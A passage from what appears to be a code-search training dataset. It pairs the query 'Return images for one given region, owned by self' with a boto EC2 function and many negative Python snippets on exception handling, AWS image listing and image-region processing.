cors.allow_all_origins and has_cookie:\n response.headers[\"Access-Control-Allow-Origin\"] = origin\n\n # If we only allow specific origins, then we have to mirror back\n # the Origin header in the response.\n elif not cors.allow_all_origins and cors.is_allowed_origin(origin=origin):\n response.headers[\"Access-Control-Allow-Origin\"] = origin\n response.headers.add_vary_header(\"Origin\")\n\n return response", "def exception_handler(exc, context):\n headers = None\n if isinstance(exc, APIException):\n headers = {}\n if getattr(exc, 'auth_header', None):\n headers['WWW-Authenticate'] = exc.auth_header\n if getattr(exc, 'wait', None):\n headers['Retry-After'] = '%d' % exc.wait\n\n data = exc.detail\n if type(data) is ErrorDetail:\n data = str(data)\n status_code = exc.status_code\n set_rollback()\n\n elif isinstance(exc, Http404):\n data = \"Not Found\"\n status_code = status.HTTP_404_NOT_FOUND\n set_rollback()\n\n else:\n data = str(exc)\n status_code = status.HTTP_500_INTERNAL_SERVER_ERROR\n\n return smart_response(data, status_code=status_code, headers=headers)", "def api_exception_handler(e):\n ep = request.url\n log.error(\"An error occured talking to k8s while working on %s: %s\", ep, e)\n\n if e.status == 404:\n msg = \"The requested resource could not be found in the API Server\"\n else:\n msg = utils.parse_error_message(e)\n\n return api.failed_response(msg, e.status)", "def handle_exception(self,exc):\n logger.error(f\"Exception in request: {traceback.format_exc()}\")\n status_obj = status.HTTP_400_BAD_REQUEST\n if type(exc) is response.Http404:\n status_obj = status.HTTP_404_NOT_FOUND\n return Response(\n MediaUtil.generate_error_image(\n status_obj,\n str(exc),\n self.request.accepted_renderer.format),\n status=status_obj)", "def log_all_exceptions(logger):\n def outer(func):\n @wraps(func)\n def inner(*args, **kwds):\n try:\n return exception_stack_catcher(func)(*args, **kwds)\n except Exception as err:\n log_wrapped_exception(logger, err)\n raise\n return inner\n return outer", "def custom_exception_handler(exc, context):\n response = exception_handler(exc, context)\n if isinstance(exc, Http404):\n response.data = {\n 'message': 'No data available' # custom exception message\n }\n return response\n try:\n print(\"Exception\", exc.get_codes())\n if 'email' in exc.get_codes() and 'unique' in exc.get_codes()['email']:\n 
response.data = {\n 'message': 'This email already exists.' # custom exception message\n }\n return response\n if 'mobile_number' in exc.get_codes() and 'unique' in exc.get_codes()['mobile_number']:\n response.data = {\n 'message': 'This mobile number already exists.' # custom exception message\n }\n return response\n if 'dev_id' in exc.get_codes() and 'unique' in exc.get_codes()['dev_id']:\n response.data = {\n 'message': 'This device already registered with other account.' # custom exception message\n }\n return response\n return response\n except:\n return response", "def handle_exception(exc_type, exception, traceback):\n report(UNKNOWN, \"unhandled exception: %s\" % (exception,))", "def handle_adminexceptions(bot, event):\n from jsb.utils.exception import exceptionlist, exceptionevents\n for e, ex in exceptionevents: logging.warn(\"%s - exceptions raised is %s\" % (e.bot.cfg.name, ex))\n event.reply(\"exceptions raised: \", exceptionlist)", "def catch_error(\n exception=None, catch_generic=True,\n exception_label=None,\n # TO FIX: where have this gone??\n # error_code=None,\n **kwargs):\n\n if exception_label is None:\n exception_label = ''\n if len(exception_label) > 0:\n exception_label += ': '\n if exception is None:\n exception = RestApiException\n\n def decorator(func):\n @wraps(func)\n def wrapper(self, *args, **kwargs):\n out = None\n\n try:\n out = func(self, *args, **kwargs)\n\n # Catch the single exception that the user requested\n except exception as e:\n\n message = exception_label + str(e)\n if hasattr(e, \"status_code\"):\n error_code = getattr(e, \"status_code\")\n return send_error(self, message, error_code)\n else:\n return send_error(self, message)\n\n # Catch the basic API exception\n except RestApiException as e:\n\n if catch_generic:\n return send_error(self, e, e.status_code)\n else:\n raise e\n\n # Catch any other exception\n except Exception as e:\n if catch_generic:\n return send_error(self, e)\n else:\n raise e\n\n return out\n return wrapper\n return decorator", "def log_exception():\n logging.basicConfig(level=logging.DEBUG)\n return logging.getLogger('exceptions_log')", "def handleExceptionsWrapper(*args, **kwargs):\n\n\t\t\t_exceptions__frame__ = True\n\n\t\t\ttry:\n\t\t\t\treturn object(*args, **kwargs)\n\t\t\texcept exceptions as error:\n\t\t\t\tfor handler in handlers:\n\t\t\t\t\thandler(error)", "def log_exception(*args, **kwds):\n cls, err = sys.exc_info()[:2]\n logging.exception('Exception in request: %s: %s', cls.__name__, err)", "def handle_expt(self):\r\n self._perform_on_error_handling()", "def _on_exception(self, exception):\n pass", "def exception_handler(engine):\n try:\n yield\n except KeyboardInterrupt:\n spooky_season = [\":skull:\", \":vampire:\", \":zombie:\", \":jack-o-lantern:\"]\n console.print(random.choice(spooky_season))\n except botocore.exceptions.BotoCoreError as e:\n console.log(\"BotoCoreError: \", e)\n except ParseException as e:\n console.log(\"Engine: ParseException\")\n syntax = Syntax(\n engine.pformat_exc(e),\n \"sql\",\n theme=\"monokai\",\n line_numbers=True,\n word_wrap=True,\n )\n console.print(Panel(syntax, title=\"Engine Details\", expand=False))\n except EngineRuntimeError as e:\n console.log(e)\n except SyntaxError as e:\n console.log(e)\n except Exception:\n console.print_exception()", "def _propagate_exc(self):\n catch_op = self._find_handler()\n if catch_op:\n # Exception caught! 
Transfer control to block\n catch_block = catch_op.parent\n self.pc = self.blockstarts[catch_block.name]\n else:\n # No exception handler!\n raise UncaughtException(self.exception)", "def _handle_error(self, exc: BaseException, reraise: bool = True) -> None:\n if self._breaker.is_system_error(exc):\n self._breaker._inc_counter()\n for listener in self._breaker.listeners:\n listener.failure(self._breaker, exc)\n self.on_failure(exc)\n else:\n self._handle_success()\n\n if reraise:\n raise exc", "def on_exception(self):\n pass", "def log_exceptions(args, *exc_types):\n try:\n yield\n except Exception as error:\n for exc_type in exc_types:\n if isinstance(error, exc_type):\n Logger.debug(str(error))\n args.exit = 1\n break\n else:\n raise", "def handle(self, exception):\n # By default, when reporting errors, err on the side of\n # terseness, to avoid leaking sensitive information.\n debug = self.app.config['DEBUG'] or self.debug\n\n if hasattr(self.app, 'manager') and hasattr(self.app.manager, '_db'):\n # There is an active database session.\n\n # Use it to determine whether we are in debug mode, in\n # which case we _should_ provide the client with a lot of\n # information about the problem, without worrying\n # whether it contains sensitive information.\n _db = self.app.manager._db\n try:\n LogConfiguration.from_configuration(_db)\n (log_level, database_log_level, handlers,\n errors) = LogConfiguration.from_configuration(\n self.app.manager._db\n )\n debug = debug or (\n LogConfiguration.DEBUG in (log_level, database_log_level)\n )\n except SQLAlchemyError as e:\n # The database session could not be used, possibly due to\n # the very error under consideration. Go with the\n # preexisting value for `debug`.\n pass\n\n # Then roll the session back.\n self.app.manager._db.rollback()\n tb = traceback.format_exc()\n\n if isinstance(exception, DatabaseError):\n # The database session may have become tainted. For now\n # the simplest thing to do is to kill the entire process\n # and let uwsgi restart it.\n logging.error(\n \"Database error: %s Treating as fatal to avoid holding on to a tainted session!\",\n exception, exc_info=exception\n )\n shutdown = flask.request.environ.get('werkzeug.server.shutdown')\n if shutdown:\n shutdown()\n else:\n sys.exit()\n\n # By default, the error will be logged at log level ERROR.\n log_method = logging.error\n\n # Okay, it's not a database error. Turn it into a useful HTTP error\n # response.\n if hasattr(exception, 'as_problem_detail_document'):\n # This exception can be turned directly into a problem\n # detail document.\n document = exception.as_problem_detail_document(debug)\n if not debug:\n document.debug_message = None\n else:\n if document.debug_message:\n document.debug_message += \"\\n\\n\" + tb\n else:\n document.debug_message = tb\n if document.status_code == 502:\n # This is an error in integrating with some upstream\n # service. It's a serious problem, but probably not\n # indicative of a bug in our software. Log it at log level\n # WARN.\n log_method = logging.warn\n response = make_response(document.response)\n else:\n # There's no way to turn this exception into a problem\n # document. 
This is probably indicative of a bug in our\n # software.\n if debug:\n body = tb\n else:\n body = _('An internal error occured')\n response = make_response(str(body), 500, {\"Content-Type\": \"text/plain\"})\n\n log_method(\"Exception in web app: %s\", exception, exc_info=exception)\n return response", "def add_basic_error_handlers(app: Flask):\n app.register_error_handler(InternalServerError, error_handling_router)\n app.register_error_handler(BadRequest, error_handling_router)\n app.register_error_handler(HTTPException, error_handling_router)\n app.register_error_handler(NotFound, error_handling_router)\n app.register_error_handler(Exception, error_handling_router)", "def handling_unknown_err(e):\n app.logger.exception(e)\n return resp_json(BaseResp.err(e.name))", "def catch_exception(*args):\n from ..operators.observable.catch import catch_exception_\n return catch_exception_(*args)", "def _handle_exceptions(f):\n\n @wraps(f)\n def wrapper(self, *args, **kwargs):\n try:\n return f(self, *args, **kwargs)\n except Exception as err:\n logger.exception(\n f\"{type(self).__name__}.{f.__name__}(*{args!r}, **{kwargs!r}) failed\"\n )\n content = self.message.content\n self.reply(f\"Oops, the {content} command encountered a problem: {err!r}\")\n\n wrapper._handle_exceptions = True\n return wrapper", "def custom_exception_handler(exception, context):\n traceback.print_exception(*sys.exc_info())\n response = exception_handler(exception, context)\n\n if isinstance(exception, GenericException):\n response = build_response(exception.status_code, exception.detail)\n\n if isinstance(exception, ObjectDoesNotExist):\n response = build_response(status.HTTP_400_BAD_REQUEST,\n str(exception)\n if str(exception).strip()\n else constants.OBJECT_NOT_FOUND_MESSAGE)\n\n if isinstance(exception, ValueError):\n response = build_response(status.HTTP_400_BAD_REQUEST,\n str(exception)\n if str(exception).strip()\n else constants.VALUE_ERROR_MESSAGE)\n\n if isinstance(exception, ValidationError):\n response = build_response(status.HTTP_400_BAD_REQUEST,\n str(exception)\n if str(exception).strip()\n else constants.VALIDATION_ERROR_MESSAGE)\n\n if response is None:\n response = build_response(status.HTTP_500_INTERNAL_SERVER_ERROR,\n constants.SERVER_ERROR_MESSAGE)\n\n response.data['message'] = response.data['detail']\n del response.data['detail']\n return response", "def handle_500(e):\n try:\n raise e\n except:\n return traceback.format_exc(), 500", "def log_exception(e):\n logger.exception(e)\n raise", "def exception_handler(self, handler):\n self.java_obj.exceptionHandler(ExceptionHandler(handler))\n return self", "def exception(self, message, *args, **kwargs):\n\n self.logger.exception(message, *args, **kwargs)", "def exception_handler(res):\n try:\n res_data = res.json()\n error_code = res_data['status']\n error_msg = build_error_msg(res_data['errors'])\n exception = DemistoException(ERROR_TITLES.get(error_code, '') + error_msg)\n\n except Exception:\n exception = DemistoException(f'Error in API call [{res.status_code}] - {res.reason}')\n\n raise exception", "def error_handler_middleware(app):\n def wsgi_app(environ, start_response):\n try:\n return app(environ, start_response)\n except Exception, e:\n logging.exception(e)\n # ... display a custom error message ...\n response = webapp.Response()\n response.set_status(500)\n response.out.write('Ooops! 
An error occurred...')\n response.wsgi_write(start_response)\n return ['']\n\n return wsgi_app", "def exception(self, *args, **kwargs):", "def handle_exception(e):\n # start with the correct headers and status code from the error\n response = e.get_response()\n # replace the body with JSON\n response.data = json.dumps({\n \"code\": e.code,\n \"name\": e.name,\n \"description\": e.description,\n })\n print(response.data)\n response.content_type = \"application/json\"\n return response", "def on_exception(self):\n\n def decorator(coro):\n self._hooks.append((\"exception\", coro))\n return coro\n\n return decorator", "def handle_exception(exc_type, exc_value, exc_traceback):\n if issubclass(exc_type, KeyboardInterrupt):\n sys.__excepthook__(exc_type, exc_value, exc_traceback)\n return\n\n log.error(\"Uncaught exception\", exc_info=(exc_type, exc_value,\n exc_traceback))", "def init_error_handler(app):\n app.register_error_handler(Exception, global_handler)\n return app", "def exc_handler(self, exc_type, exc, *args) -> None:\n self.exception = exc\n self.exit_code = 1", "def log_exception(sender, exception, **extra):\n app.logger.error('Error in Geocoding Service: %s', exception)", "def logged_errors(func):\n @wraps(func)\n def wrapper(*args, **kwrds):\n try:\n return func(*args, **kwrds)\n except:\n etype, evalue, etrace = sys.exc_info()\n app_logger().error(\"ERROR HANDLER => %s: %s\\n%s\\n\", etype, evalue, etrace)\n return abort(500)\n return wrapper", "def exception(msg):\n log('EXCEPTION', msg)", "def jsonify_unknown_exception(exception: Exception):\n current_app.logger.exception('Unhandled exception has been raised!')\n return jsonify(DEFAULT_MESSAGE, 500)", "def raise_exception(request):\n raise Exception(\"Let's test error handling\")", "async def on_handle_message_error(self, message: andesite.ReceiveOperation, exc: Exception) -> None:\n log.error(f\"uncaught error {exc} in {self} when handling message {message}\")", "def exception(self, msg, *args, **kwargs):\n ex = sys.exc_info()[1]\n\n if hasattr(ex, '_monocle'):\n args = args + (format_tb(ex),)\n self.logger.error('%s\\n%%s' % msg, *args, **kwargs)\n else:\n super(Adapter, self).exception(msg, *args, **kwargs)", "def exception_handler(result, name=\"\"):\n try:\n response_content = result.json()\n # pylint: disable=broad-except\n except Exception:\n response_content = result.text\n\n exc_map = {\n 300: SFDC_MoreThanOneRecord,\n 400: SFDC_MalformedRequest,\n 401: SFDC_ExpiredSession,\n 403: SFDC_RefusedRequest,\n 404: SFDC_ResourceNotFound,\n }\n exc_cls = exc_map.get(result.status_code, SFDC_GeneralError)\n\n raise exc_cls(result.url, result.status_code, name, response_content)", "def exception_handler(exctype, val, trace):\n logger.info(\n ''.join(traceback.format_exception(exctype, val, trace)))", "def simplecatcher(application):\n def simplecatcher_app(environ, start_response):\n try:\n return application(environ, start_response)\n except:\n out = StringIO()\n traceback.print_exc(file=out)\n start_response('500 Server Error',\n [('content-type', 'text/html')],\n sys.exc_info())\n res = out.getvalue()\n return ['<h3>Error</h3><pre>%s</pre>'\n % html_quote(res)]\n return simplecatcher_app", "def error_handler(driver, all_loggers, retrydict, msg, testcase=None):\n totals = dict(passed=0, failed=0, executed=0, total=0)\n logger = all_loggers[0]\n try:\n yield\n except (selexcept.NoSuchElementException, selexcept.ElementNotVisibleException,\n selexcept.StaleElementReferenceException, selexcept.WebDriverException,\n 
exceptlib.ListOrderComparisonError, exceptlib.TextNotFoundError, IndexError), error:\n loglib.logErrors(all_loggers, retrydict, traceback.format_exc(), msg, error)\n if testcase: logger.info(testcase)\n except Exception, error:\n driver.quit()\n loglib.logTotalTestResults(totals, logger, gorked=True)\n loglib.logErrors(all_loggers, retrydict, traceback.format_exc(), msg, error)\n logger.info('-=' * 30 + '-')\n sys.exit(1)" ]
[ "0.71580285", "0.69891423", "0.68551576", "0.68176335", "0.66826653", "0.65763485", "0.6536817", "0.6521186", "0.6516178", "0.65054154", "0.64914984", "0.6473506", "0.6451797", "0.6449465", "0.64328057", "0.63658404", "0.6359318", "0.6342113", "0.632365", "0.6301916", "0.6286596", "0.62711996", "0.62704885", "0.6266336", "0.6250016", "0.6243729", "0.6236881", "0.6228097", "0.62198865", "0.62172794", "0.62061685", "0.6186442", "0.6160992", "0.615859", "0.61416614", "0.6140795", "0.61390007", "0.6124955", "0.61165744", "0.61159587", "0.6114323", "0.6105731", "0.6090698", "0.60760367", "0.60758007", "0.6073987", "0.60580343", "0.6046357", "0.60446805", "0.60432774", "0.60424095", "0.6030432", "0.6020261", "0.60139287", "0.5989537", "0.5982617", "0.5969156", "0.59537643", "0.5951111", "0.5940716", "0.5930293", "0.5921563", "0.5913937", "0.5911834", "0.5907317", "0.5907104", "0.59042394", "0.5882256", "0.58555144", "0.58553505", "0.5837034", "0.5821295", "0.58170885", "0.5815853", "0.5813546", "0.58134127", "0.5809713", "0.58086544", "0.5808306", "0.5806344", "0.5803658", "0.5799172", "0.5798229", "0.5793174", "0.57802635", "0.5769823", "0.5767941", "0.5753668", "0.57504094", "0.57487404", "0.57432145", "0.574288", "0.57414263", "0.57410526", "0.57402635", "0.5734592", "0.57327706", "0.57232535", "0.570902", "0.570756" ]
0.5860892
68
Return images for one given region, owned by self
def getImages(region):
    creds = credentials()
    try:
        conn = ec2.connect_to_region(region, **creds)
        images = conn.get_all_images(owners=['self'])
    except boto.exception.EC2ResponseError:
        return []
    return images
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def getregion(self, *args, **kwargs):\n return _image.image_getregion(self, *args, **kwargs)", "def get_image_by_version(self, region, version=None):\n pass", "def get_images(self, region):\n try:\n conn = ec2.connect_to_region(region, **self.credentials)\n region_images = conn.get_all_images(owners=['self'])\n except boto.exception.EC2ResponseError:\n return []\n return region_images", "def getImagesD(region):\n images = getImages(region)\n imageDicts = []\n for im in images:\n imageDict = {\"name\": im.name,\n \"id\": im.id,\n \"region\": im.region.name,\n \"state\": im.state,\n \"created\": im.creationDate,\n \"type\": im.type,\n \"KEEP\": getKeepTag(im),\n \"name_tag\": get_name_tag(im),\n \"snapshots\": getSnapshotsOf(im),\n \"description\": im.description,\n \"PROD\": isProduction(im)\n }\n imageDicts.append(imageDict)\n return imageDicts", "def split(self):\n sub_images = []\n\n for region in regionprops(self.cells):\n minr, minc, maxr, maxc = region.bbox\n sub_image = self.image_raw[max(0, minr - 10):maxr, max(0, minc - 10):maxc, :]\n\n sub_images.append(FQimage(data=sub_image))\n\n return sub_images", "def image(self, name=None):\n return self.find(self.images(), name=name)", "def region(self):\n return regions.lookup(self.state)", "def GetImageRegion(self) -> \"itkImageRegion2 const &\":\n return _itkScalarImageKmeansImageFilterPython.itkScalarImageKmeansImageFilterIUS2IUS2_GetImageRegion(self)", "def GetImageRegion(self) -> \"itkImageRegion2 const &\":\n return _itkScalarImageKmeansImageFilterPython.itkScalarImageKmeansImageFilterIUS2ISS2_GetImageRegion(self)", "def GetImageRegion(self) -> \"itkImageRegion2 const &\":\n return _itkScalarImageKmeansImageFilterPython.itkScalarImageKmeansImageFilterIF2IUS2_GetImageRegion(self)", "def get_texture(images, region_points, texture_size=256):\n\n # Build a (4,2) array of X/Y texture coordinates for a\n # texture_size x texture_size square. 
The coordinates should\n # start at the top left (0,0) and proceed clockwise.\n\n for image, rect_points in zip(images, region_points):\n # Find a homography that warps the points for the current region to the\n # texture coordinates.\n\n # Warp the image with the homography to obtain the texture for this\n # image and append it to the list of textures.\n pass\n\n # Return the mean texture across the images.\n return None", "def GetImageRegion(self) -> \"itkImageRegion2 const &\":\n return _itkScalarImageKmeansImageFilterPython.itkScalarImageKmeansImageFilterISS2IUS2_GetImageRegion(self)", "def GetImageRegion(self) -> \"itkImageRegion2 const &\":\n return _itkScalarImageKmeansImageFilterPython.itkScalarImageKmeansImageFilterIUS2IUC2_GetImageRegion(self)", "def GetImageRegion(self) -> \"itkImageRegion2 const &\":\n return _itkScalarImageKmeansImageFilterPython.itkScalarImageKmeansImageFilterIF2ISS2_GetImageRegion(self)", "def get_images(self, page_number):", "def GetImageRegion(self) -> \"itkImageRegion2 const &\":\n return _itkScalarImageKmeansImageFilterPython.itkScalarImageKmeansImageFilterIUC2IUS2_GetImageRegion(self)", "def GetImageRegion(self) -> \"itkImageRegion2 const &\":\n return _itkScalarImageKmeansImageFilterPython.itkScalarImageKmeansImageFilterIF2IUC2_GetImageRegion(self)", "def get(cls, name):\n return cls.images[name]", "def getimgs():", "def find_instances(self, image, region, overlap):\n self.image = np.copy(image)\n\n self.eff_step_size = int((1.0-overlap)*self.eff_box_size)\n\n y_steps = (region[3]-region[1])//self.eff_step_size\n x_steps = (region[2]-region[0])//self.eff_step_size\n\n if region[0]+(x_steps-1)*self.eff_step_size+self.eff_box_size>region[2]:\n x_steps -= 1\n if region[1]+(y_steps-1)*self.eff_step_size+self.eff_box_size>region[3]:\n y_steps -= 1\n\n if self.single_hog:\n self.resized_image = image[region[1]:region[3],region[0]:region[2],:]\n self.resized_image = cv2.resize(self.resized_image, (int(self.resized_image.shape[1]/self.scaling), int(self.resized_image.shape[0]/self.scaling)))\n features, img = self.hogger.hog_image(self.resized_image, visualize=False, feature_vector=False)\n features = np.array(features)\n self.find_instances_in_features(features, region)\n return self.image, self.resized_image\n else:\n for row in range(y_steps):\n off_y = region[1] + row * self.eff_step_size\n for col in range(x_steps):\n off_x = region[0]+col * self.eff_step_size\n sub_sample = self.get_resized_sub_sample(off_x, off_y)\n pred = self.classifier.classify(sub_sample)\n if(pred==1.0):\n cv2.rectangle(self.image, (off_x, off_y), (off_x+self.eff_box_size, off_y+self.eff_box_size), color=(255,255,255), thickness=2)\n self.boundings.append(((off_x, off_y), (off_x+self.eff_box_size, off_y+self.eff_box_size)))\n\n return self.image, None", "def nine_regions(self):\n\n coordinateList = []\n\n # Top left.\n x = (int)( self.oriImgSize[IDX_WIDTH] * self.ratioTopLeft[IDX_X] )\n y = (int)( self.oriImgSize[IDX_HEIGHT] * self.ratioTopLeft[IDX_Y] )\n coordinateList.append( [x, y] )\n\n # Top center.\n x = (int)( self.oriImgSize[IDX_WIDTH] * 0.5 - self.regionSize[IDX_WIDTH] / 2 )\n y = (int)( self.oriImgSize[IDX_HEIGHT] * self.ratioTopLeft[IDX_Y] ) \n coordinateList.append( [x, y] )\n\n # Top right.\n x = (int)( self.oriImgSize[IDX_WIDTH] * ( 1.0 - self.ratioTopLeft[IDX_X] ) - self.regionSize[IDX_WIDTH] )\n y = (int)( self.oriImgSize[IDX_HEIGHT] * self.ratioTopLeft[IDX_Y] )\n coordinateList.append( [x, y] )\n\n # Center left.\n x = (int)( self.oriImgSize[IDX_WIDTH] * 
self.ratioTopLeft[IDX_X] )\n y = (int)( self.oriImgSize[IDX_HEIGHT] * 0.5 - self.regionSize[IDX_HEIGHT] / 2 )\n coordinateList.append( [x, y] )\n\n # Center.\n x = (int)( self.oriImgSize[IDX_WIDTH] * 0.5 - self.regionSize[IDX_WIDTH] / 2 )\n y = (int)( self.oriImgSize[IDX_HEIGHT] * 0.5 - self.regionSize[IDX_HEIGHT] / 2 )\n coordinateList.append( [x, y] )\n\n # Center right.\n x = (int)( self.oriImgSize[IDX_WIDTH] * (1.0 - self.ratioTopLeft[IDX_X]) - self.regionSize[IDX_WIDTH] )\n y = (int)( self.oriImgSize[IDX_HEIGHT] * 0.5 - self.regionSize[IDX_HEIGHT] / 2 )\n coordinateList.append( [x, y] )\n\n # Bottom left.\n x = (int)( self.oriImgSize[IDX_WIDTH] * self.ratioTopLeft[IDX_X] )\n y = (int)( self.oriImgSize[IDX_HEIGHT] * (1.0 - self.ratioTopLeft[IDX_Y]) - self.regionSize[IDX_HEIGHT] )\n coordinateList.append( [x, y] )\n\n # Bottom center.\n x = (int)( self.oriImgSize[IDX_WIDTH] * 0.5 - self.regionSize[IDX_WIDTH] / 2 )\n y = (int)( self.oriImgSize[IDX_HEIGHT] * (1.0 - self.ratioTopLeft[IDX_Y]) - self.regionSize[IDX_HEIGHT] )\n coordinateList.append( [x, y] )\n\n # Bottom right.\n x = (int)( self.oriImgSize[IDX_WIDTH] * (1.0 - self.ratioTopLeft[IDX_X]) - self.regionSize[IDX_WIDTH] )\n y = (int)( self.oriImgSize[IDX_HEIGHT] * (1.0 - self.ratioTopLeft[IDX_Y]) - self.regionSize[IDX_HEIGHT] )\n coordinateList.append( [x, y] )\n\n return coordinateList", "def GetImageRegion(self) -> \"itkImageRegion2 const &\":\n return _itkScalarImageKmeansImageFilterPython.itkScalarImageKmeansImageFilterISS2ISS2_GetImageRegion(self)", "def GetImageRegion(self) -> \"itkImageRegion2 const &\":\n return _itkScalarImageKmeansImageFilterPython.itkScalarImageKmeansImageFilterIUC2IUC2_GetImageRegion(self)", "def other_object(img):\n return img[500:570, 1000:1070]", "def GetImageRegion(self) -> \"itkImageRegion2 const &\":\n return _itkScalarImageKmeansImageFilterPython.itkScalarImageKmeansImageFilterISS2IUC2_GetImageRegion(self)", "def iterateRegions(self, image):\n\n h, w = image.shape\n\n for i in range(h - (self.size - 1)):\n for j in range(w - (self.size - 1)):\n im_region = image[i:(i + self.size), j:(j + self.size)]\n yield im_region, i, j", "def select_region_of_interest():\r\n image = np.array(ImageGrab.grab(bbox=None))\r\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\r\n r = cv2.selectROI(windowName='grab roi', img=image, showCrosshair=True, fromCenter=False)\r\n cv2.destroyAllWindows()\r\n return r[0], r[1], r[0] + r[2], r[1] + r[3]", "def GetImageRegion(self) -> \"itkImageRegion2 const &\":\n return _itkScalarImageKmeansImageFilterPython.itkScalarImageKmeansImageFilterIUC2ISS2_GetImageRegion(self)", "def get_image(name):\r\n return nova.images.find(name=name)", "def images_at(self, rects, colorkey = None):\n return [self.image_at(rect, colorkey) for rect in rects]", "def get_image(self, record_id):\n \n for img in self.img_lst:\n if img.get_recordId() == str(record_id):\n return img", "def get_image(self, imnames, idx):\r\n path = os.path.join(self.img_path, imnames[idx])\r\n return Image.open(path).convert('RGB')", "def region_of_interest(self, img):\n # get region vertices\n r1, r2, r3, r4 = self.region_filter_params[\"ratios\"]\n img_height, img_width = img.shape\n vertices = define_region_vertices(img_height, img_width, r1, r2, r3, r4)\n\n # defining a blank mask to start with\n mask = np.zeros_like(img)\n\n # defining a 3 channel or 1 channel color to fill the mask with depending on the input image\n if len(img.shape) > 2:\n channel_count = img.shape[2] # i.e. 
3 or 4 depending on your image\n ignore_mask_color = (255,) * channel_count\n else:\n ignore_mask_color = 255\n\n # filling pixels inside the polygon defined by \"vertices\" with the fill color\n cv2.fillPoly(mask, [vertices], ignore_mask_color)\n\n # returning the image only where mask pixels are nonzero\n masked_image = cv2.bitwise_and(img, mask)\n return masked_image", "def get_img(self, img=None):\n\n if self.img is None: #No image specified to the ROI object\n\n # If no image is saved, check if an image was passed. If so, return the ROI of that image.\n if img is None:\n print('no image provided')\n else:\n return img[self.coords[0]:self.coords[1], self.coords[2]:self.coords[3]]\n else:\n return self.img", "def GetImageRegion(self) -> \"itkImageRegion3 const &\":\n return _itkScalarImageKmeansImageFilterPython.itkScalarImageKmeansImageFilterIUS3IUS3_GetImageRegion(self)", "def getimage(self):", "def GetImageRegion(self) -> \"itkImageRegion3 const &\":\n return _itkScalarImageKmeansImageFilterPython.itkScalarImageKmeansImageFilterIUS3ISS3_GetImageRegion(self)", "def get_region(self, region, namespace, region_id, **filters):\n filters['namespace'] = namespace\n return self.get_resource('data/wow/region/{0}', region, *[region_id], **filters)", "def GetImageRegion(self) -> \"itkImageRegion3 const &\":\n return _itkScalarImageKmeansImageFilterPython.itkScalarImageKmeansImageFilterIF3IUS3_GetImageRegion(self)", "def image(images):\n return images[0]", "def image_for_domain(self, target_domain, _):\n img, extent, origin = _merge_tiles(self.tiles)\n return img, extent, origin", "def test_grdimage_slice(grid):\n grid_ = grid.sel(lat=slice(-30, 30))\n fig = Figure()\n fig.grdimage(grid_, cmap=\"earth\", projection=\"M6i\")\n return fig", "def getslice(self, *args, **kwargs):\n return _image.image_getslice(self, *args, **kwargs)", "def GetImageSet(cls, ID):\n if ID in cls._imageSets:\n return cls._imageSets[ID]", "def GetImageRegion(self) -> \"itkImageRegion3 const &\":\n return _itkScalarImageKmeansImageFilterPython.itkScalarImageKmeansImageFilterIF3ISS3_GetImageRegion(self)", "def get_region(self, region):\n\n return self.adapter.get_region(region) \n\n\n\n\n #file_compression = \"\"\n # magic_dict = {\n # b\"\\x1f\\x8b\\x08\": \"gz\",\n # b\"\\x42\\x5a\\x68\": \"bz2\",\n # b\"\\x50\\x4b\\x03\\x04\": \"zip\"\n # }\n # \n\n # max_len = max(len(x) for x in magic_dict)\n # with open(file_path, \"rb\") as f:\n # file_start = f.read(max_len)\n # for magic, filetype in magic_dict.items():\n # if file_start.startswith(magic):\n # file_compression = filetype\n # split_ext = file_path.split(\".\")\n # extension = split_ext[len(split_ext) -1]\n # if(file_compression == \"zip\"):\n # if extension != \"zip\":\n # subprocess.call(\"mv {} {}.zip\".format(file_path, file_path).split())\n # subprocess.call(\"unzip {} -d .\".format(file_path).split())\n # if(file_compression == \"bz2\"):\n # if extension != \"bz2\":\n # subprocess.call(\"mv {} {}.bz2\".format(file_path,file_path).split())\n # subprocess.call(\"bzip2 -df {}\".format(file_path).split())\n # if(file_compression == \"gz\"):\n # if extension != \"gz\":\n # subprocess.call(\"mv {} {}.gz\".format(file_path,file_path).split())\n # subprocess.call(\"gzip -df {}\".format(file_path).split())", "def imagesAt(self, rects, colorKey = None):\n return [self.image_at(rect, colorKey) for rect in rects]", "def GetImage(self, which=TreeItemIcon_Normal):\r\n \r\n return self._images[which]", "def GetImageRegion(self) -> \"itkImageRegion3 const &\":\n return 
_itkScalarImageKmeansImageFilterPython.itkScalarImageKmeansImageFilterISS3IUS3_GetImageRegion(self)", "def GetImageRegion(self) -> \"itkImageRegion3 const &\":\n return _itkScalarImageKmeansImageFilterPython.itkScalarImageKmeansImageFilterIUS3IUC3_GetImageRegion(self)", "def query_image_tile(self, coord):", "def region(self):\n return GridRegionIndexer(self)", "def list_images(self):\n raise NotImplementedError()", "def list_images(self):\n \n logging.debug(\"list_images entered for %s\" % self.machine_name) \n snapshots = cs.list_snapshots()\n res = []\n server_id = self.cloudserver.id\n # find the one for this server\n for snapshot in snapshots:\n img = snapshot.metadata.get(\"instance_uuid\", None)\n # print img\n\n if img == server_id:\n print \"Server %s has snapshot %s\" % (server_id, img)\n res.append(img)\n\n return res", "def getRegion(self, format=(TILE_FORMAT_IMAGE, ), **kwargs):\n if not isinstance(format, (tuple, set, list)):\n format = (format, )\n # The tile iterator handles determining the output region\n iterInfo = self._tileIteratorInfo(**kwargs)\n # Only use gdal.Warp of the original image if the region has not been\n # styled.\n useGDALWarp = (\n iterInfo and\n not self._jsonstyle and\n TILE_FORMAT_IMAGE in format and\n kwargs.get('encoding') == 'TILED')\n if not useGDALWarp:\n return super().getRegion(format, **kwargs)\n srs = self.projection or self.getProj4String()\n tl = self.pixelToProjection(\n iterInfo['region']['left'], iterInfo['region']['top'], iterInfo['level'])\n br = self.pixelToProjection(\n iterInfo['region']['right'], iterInfo['region']['bottom'], iterInfo['level'])\n outWidth = iterInfo['output']['width']\n outHeight = iterInfo['output']['height']\n gdalParams = large_image.tilesource.base._gdalParameters(\n defaultCompression='lzw', **kwargs)\n gdalParams += ['-t_srs', srs] if srs is not None else [\n '-to', 'SRC_METHOD=NO_GEOTRANSFORM']\n gdalParams += [\n '-te', str(tl[0]), str(br[1]), str(br[0]), str(tl[1]),\n '-ts', str(int(math.floor(outWidth))), str(int(math.floor(outHeight))),\n ]\n\n fd, outputPath = tempfile.mkstemp('.tiff', 'tiledGeoRegion_')\n os.close(fd)\n try:\n self.logger.info('Using gdal warp %r', 